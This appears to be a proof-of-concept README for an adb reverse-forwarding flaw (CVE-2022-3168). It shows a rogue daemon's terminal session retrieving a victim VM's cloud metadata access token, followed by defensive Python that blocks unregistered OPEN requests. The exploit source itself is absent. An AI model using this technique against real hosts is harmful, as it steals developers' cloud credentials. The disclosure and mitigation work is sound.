Proof of concept code to exploit flaw in adb that allowed opening network connections on the host to arbitrary destinations

irsl/CVE-2022-3168-adb-unexpected-reverse-forwards

The reverse tunnel feature in Android Debug Bridge (adb) was vulnerable: it allowed a malicious adb daemon to open connections to arbitrary hosts/ports and Unix domain sockets on the host.

Attacker window (where the rogue daemon is running):

$ ./adb_rogue_daemon.py

Victim window (a GCE VM in this example):

$ adb connect serverip:5556
connected to 8.tcp.ngrok.io:19076

Attacker window:

...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type: application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer: Metadata Server for VM\r\nConnection: Close\r\nContent-Length: 1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted].....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'
<<< b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
('....', (774778414, 774778414, 774778414, 774778414, 774778414), b'...........................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba')

This was fixed in Platform Tools 33.0.3.
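As an added illustration (not code from this repository or from adb itself), the following Python parses adb packet headers such as the CLSE trailer printed above and applies the host-side rule that closes this hole: a device-originated OPEN is honoured only when its destination was registered with `adb reverse`. The registered set, the two OPEN packets and the TEST-NET destination are constructed samples.

```python
import struct

# adb packet header: six little-endian uint32 fields (24 bytes).
HEADER = struct.Struct("<6I")  # command, arg0, arg1, data_length, data_check, magic
A_OPEN = struct.unpack("<I", b"OPEN")[0]  # command word as the header stores it


def build_packet(cmd, arg0, arg1, payload=b""):
    """Encode one packet: data_check = byte sum, magic = cmd ^ 0xFFFFFFFF."""
    return HEADER.pack(cmd, arg0, arg1, len(payload),
                       sum(payload) & 0xFFFFFFFF, cmd ^ 0xFFFFFFFF) + payload


def parse_packet(buf):
    """Validate magic, length and (legacy) checksum; return the packet's fields."""
    if len(buf) < HEADER.size:
        raise ValueError("short header")
    cmd, arg0, arg1, dlen, dcheck, magic = HEADER.unpack_from(buf)
    if magic != cmd ^ 0xFFFFFFFF:
        raise ValueError("magic does not match command word")
    payload = buf[HEADER.size:HEADER.size + dlen]
    if len(payload) != dlen:
        raise ValueError("truncated payload")
    # Newer protocol versions send data_check = 0; only verify a non-zero one.
    if dcheck and dcheck != (sum(payload) & 0xFFFFFFFF):
        raise ValueError("bad checksum")
    return {"command": struct.pack("<I", cmd), "arg0": arg0, "arg1": arg1,
            "payload": payload}


def audit_open(pkt, registered_reverse):
    """Host-side policy for a device-originated OPEN: honour only destinations
    the user registered with `adb reverse`; refuse (and log) anything else."""
    if pkt["command"] != b"OPEN":
        return "ignore"
    dest = pkt["payload"].split(b"\0", 1)[0].decode("ascii", "replace")
    return "allow" if dest in registered_reverse else "block"


# The CLSE packet at the end of the rogue daemon's output above (arg0=8, arg1=1234).
CLSE_FROM_README = (b"CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00"
                    b"\x00\x00\x00\x00\xbc\xb3\xac\xba")
# Constructed samples: the forward the user set up, and an OPEN naming a
# destination (TEST-NET address) the user never configured.
REGISTERED = {"tcp:8080"}
OPEN_EXPECTED = build_packet(A_OPEN, 1, 0, b"tcp:8080\0")
OPEN_ROGUE = build_packet(A_OPEN, 2, 0, b"tcp:192.0.2.10:80\0")

if __name__ == "__main__":
    print(parse_packet(CLSE_FROM_README))
    for p in (OPEN_EXPECTED, OPEN_ROGUE):
        print(audit_open(parse_packet(p), REGISTERED))
```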
